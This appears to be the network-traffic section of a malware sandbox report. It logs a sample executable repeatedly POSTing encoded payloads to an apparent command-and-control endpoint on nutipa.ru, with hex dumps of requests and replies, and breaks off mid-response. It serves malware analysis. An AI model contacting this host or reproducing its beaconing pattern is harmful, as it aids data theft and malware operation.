                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:04.775824070 CET   25   IN   HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:05.073611975 CET   791   IN   HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNlc6cCI3BAg9lA2zAkOPyIen9R61xgi94G5QX%2BtK6fx0iauzF3eAiUcSuB%2FC0OQh%2BR1Btidoxg1iqescXH4NAO95UO4%2FnSU283SU7nueugyTsNp22VJviSj4kI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288af7eb66de92-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4031&min_rtt=1560&rtt_var=5528&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=68435&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:05.211983919 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                            32   192.168.2.4   49777   104.21.64.130   80   7956   C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp   Bytes transferred   Direction   Data
                                                            Dec 15, 2024 19:37:04.823810101 CET   296   OUT   POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1392
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:05.914911985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:06.180558920 CET | 943 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vhUTML%2F6MOjghhNFkqY5CXTiCvNoOefLcBMgeRvBJyCGO%2FfFmyjgEEgF6%2BwkPqh8slxfhVB2Tg5fNcglb9fINJ4FpS9NPVZ8kXjdFvnnnUPYuHCS8zSbbLfnOo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288aff0aa65e80-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4459&min_rtt=1734&rtt_var=6100&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1688&delivery_rate=62035&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 10 35 04 3e 1f 37 10 28 19 39 2c 25 50 3c 33 23 1b 24 31 26 07 30 2b 3b 14 3e 3e 3f 11 31 2a 21 13 23 0c 31 56 3f 09 26 01 32 0c 21 51 03 11 22 1d 24 2d 2c 58 3e 2a 30 5c 32 1f 23 5a 24 3e 20 5f 28 06 3a 56 30 38 24 0b 22 2d 28 1a 2d 14 38 1f 3f 39 28 05 2d 07 3a 50 21 26 2e 53 0c 17 26 03 2b 17 39 07 37 0c 39 55 30 2f 2b 54 37 5f 3a 10 3e 23 01 0f 30 0d 0d 55 26 3e 34 19 22 33 3a 09 32 5c 21 03 34 32 36 1c 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 9895>7(9,%P<3#$1&0+;>>?1*!#1V?&2!Q"$-,X>*0\2#Z$> _(:V08$"-(-8?9(-:P!&.S&+979U0/+T7_:>#0U&>4"3:2\!426>%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            33 | 192.168.2.4 | 49778 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:05.466188908 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:05.810556889 CET | 2536 | OUT | Data Raw: 55 53 43 5c 5f 5e 58 5e 5d 5a 56 51 50 59 57 56 55 50 5e 43 5a 5e 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USC\_^X^]ZVQPYWVUP^CZ^[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z+[&> #,=<-3[7? Y2-=%.!=3_'>!+0:/.F'#P #
                                                            Dec 15, 2024 19:37:06.552443981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:06.799824953 CET | 790 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIk8IUKQzskfwJieMrGcRZQfpMB1Gd2uqk0bIMCHT9hHEGkwpfkqmodDrgZyL0JFQlCS%2FVu1PQhoolkSJ2lVSN568HDDU4gu5Yt6yPa0y7MdNXiCKa1VFyjsNgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b030dabde95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4699&min_rtt=1608&rtt_var=6785&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=55431&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            34 | 192.168.2.4 | 49780 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:07.035840988 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:07.388855934 CET | 2536 | OUT | Data Raw: 55 53 43 5a 5f 56 58 51 5d 5a 56 51 50 59 57 52 55 54 5e 40 5a 51 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCZ_VXQ]ZVQPYWRUT^@ZQ[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(>1?9'#<6)=+Y47&>*Y%%=3?X$X>+U%U/;.F'#P #
                                                            Dec 15, 2024 19:37:08.129970074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:08.373287916 CET | 785 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AvpWBttvX0o4rgUSqYpogCnG6FQiRtZ4aA2joR5eyGVdicLA6kRhyHMtiv58uG9gX2FoxA1G76Swl78bDBFHelIon2O92gpyCJcn2PJEHwsFm%2FBrw05QrYeHlEY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b0cdf5ff795-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4959&min_rtt=1870&rtt_var=6880&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=54916&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:08.565452099 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            35 | 192.168.2.4 | 49782 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:08.803869963 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:09.154298067 CET | 2536 | OUT | Data Raw: 50 5f 46 5f 5f 59 58 56 5d 5a 56 51 50 50 57 5b 55 53 5e 47 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_F__YXV]ZVQPPW[US^GZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?">:6:D)-$#Z'.)12=0<3=<0!/.F'#P
                                                            Dec 15, 2024 19:37:09.890419960 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:10.145395994 CET | 802 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQS30vOt6TniuStzuE%2Fg%2BkvXTF62YXrge9OQ8OpHAgtFNAXrreKuk4ftMYHdU%2BL9Q2AaGbI%2BvgtDNdqqdpJm9XCG3FxNLa%2B0Fin1H%2FwFZU6Rx%2FmxE0JXdUWNX5g%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b17df150cbe-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3434&min_rtt=1559&rtt_var=4336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=88137&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            36 | 192.168.2.4 | 49788 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:10.392422915 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            37 | 192.168.2.4 | 49789 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:10.662281036 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:11.013825893 CET | 2536 | OUT | Data Raw: 50 52 43 5b 5a 5c 58 55 5d 5a 56 51 50 5d 57 5b 55 5d 5e 40 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRC[Z\XU]ZVQP]W[U]^@ZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+!)\<6+8!/%>1'->>333X:]+=T,.F'#P 3
                                                            Dec 15, 2024 19:37:11.748574018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:12.029824972 CET | 802 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wcXn8mLaw0%2BjwKh0M%2FUhoxrUwJI9uQ00eV%2BxaUVt0ymZST6O1Nd9NOaXXJ%2FsQxEe%2BUQP%2BzvrZPBNqDcWt2WVn%2B4DdLhhthMLBlqLpMdbQhxCZbaF00P5WaG5mg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b237d847c7b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4207&min_rtt=2198&rtt_var=4842&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=79903&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            38 | 192.168.2.4 | 49790 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:11.312897921 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1392
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:11.669907093 CET | 1392 | OUT | Data Raw: 55 53 46 5b 5a 5d 58 5f 5d 5a 56 51 50 5f 57 5a 55 51 5e 42 5a 53 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USF[Z]X_]ZVQP_WZUQ^BZS[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+)=9;]6:E<=$7??12]&-9T><'X&^? ),;.F'#P
                                                            Dec 15, 2024 19:37:12.400815010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:12.648510933 CET | 943 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3R5X1xGLj%2BqMHSdHSD5IxDXUHp7If0YqJalPUX40fXqAORfh%2FMSvGklUc8fU2JVcz8Jhmyk2arS8alfO5AkRhNpT%2BQxLJvDztFVA2vedjQKIciio8Hl6smPYhc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b278eb6c33c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1713&rtt_var=5801&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1688&delivery_rate=65327&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5d 22 2a 25 0b 21 3d 37 0c 2e 3c 3e 09 28 23 3f 18 27 0c 0f 58 33 38 24 01 29 2d 2b 57 25 00 3e 06 34 1c 25 57 2b 27 07 12 31 36 21 51 03 11 22 5f 31 00 01 00 2b 3a 33 02 25 31 3f 5f 25 2e 3f 07 2b 3b 32 55 27 16 09 1d 34 00 28 1a 2d 04 20 12 3c 29 2b 17 3a 2e 26 57 20 36 2e 53 0c 17 26 00 28 17 2e 58 23 21 36 08 27 5a 27 56 34 2a 2e 52 2a 30 34 1d 27 23 23 56 26 2d 3c 1a 35 30 0b 57 25 14 0c 10 37 32 00 13 3d 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989]"*%!=7.<>(#?'X38$)-+W%>4%W+'16!Q"_1+:3%1?_%.?+;2U'4(- <)+:.&W 6.S&(.X#!6'Z'V4*.R*04'##V&-<50W%72="%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            39 | 192.168.2.4 | 49796 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:12.272524118 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:12.623008013 CET | 2536 | OUT | Data Raw: 50 5f 43 5d 5a 5c 58 51 5d 5a 56 51 50 51 57 55 55 55 5e 40 5a 51 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_C]Z\XQ]ZVQPQWUUU^@ZQ[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[<>.X):\",6+(#'%11>) ;X'*\<=S8;.F'#P
                                                            Dec 15, 2024 19:37:13.359605074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:13.618988991 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRBhTz54%2Bp%2BBmFdDL3DvJtWtDLwWN2iuSXKayEgBZtNiabGKRhaeJV2XNOMPGUhGqYAG%2FxJr5t1b8kjaXMot5m6O9hPM8D9zamvdfRbXQYF8t5oQLgu1KSmSS68%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b2d88605e60-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4046&min_rtt=2192&rtt_var=4531&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=85736&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            40 | 192.168.2.4 | 49797 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:13.868746042 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:14.216994047 CET | 2536 | OUT | Data Raw: 55 53 43 58 5a 5c 58 5e 5d 5a 56 51 50 59 57 51 55 57 5e 48 5a 56 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCXZ\X^]ZVQPYWQUW^HZV[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_+-^>:56A+>+Z!,;%.-1P>#Z%>:X(0&/;.F'#P #
                                                            Dec 15, 2024 19:37:14.956434965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:15.213340044 CET | 797 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5SnANsmVKGsqebKjzMeh8OZsJM55kXpuRjz3ECxOoPJTyUAIyVrD3N8qBYC%2BzskHpkE3fpTqrG%2FVTOMYmtmWE4nYj6V5A5oF%2BnKMsOzI688A6o0t8D7hmz%2BwfA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b378df07d1c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3373&min_rtt=1954&rtt_var=3571&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=109700&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            41 | 192.168.2.4 | 49805 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:15.459558010 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:15.810451031 CET | 2536 | OUT | Data Raw: 50 5f 43 5b 5f 56 58 51 5d 5a 56 51 50 5e 57 56 55 5c 5e 42 5a 56 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_C[_VXQ]ZVQP^WVU\^BZV[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\+.>)\8!!?;!/<Z%X&]%!)#^$-&_?U9W,+.F'#P ?
                                                            Dec 15, 2024 19:37:16.574862003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:16.822527885 CET | 790 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:16 GMT
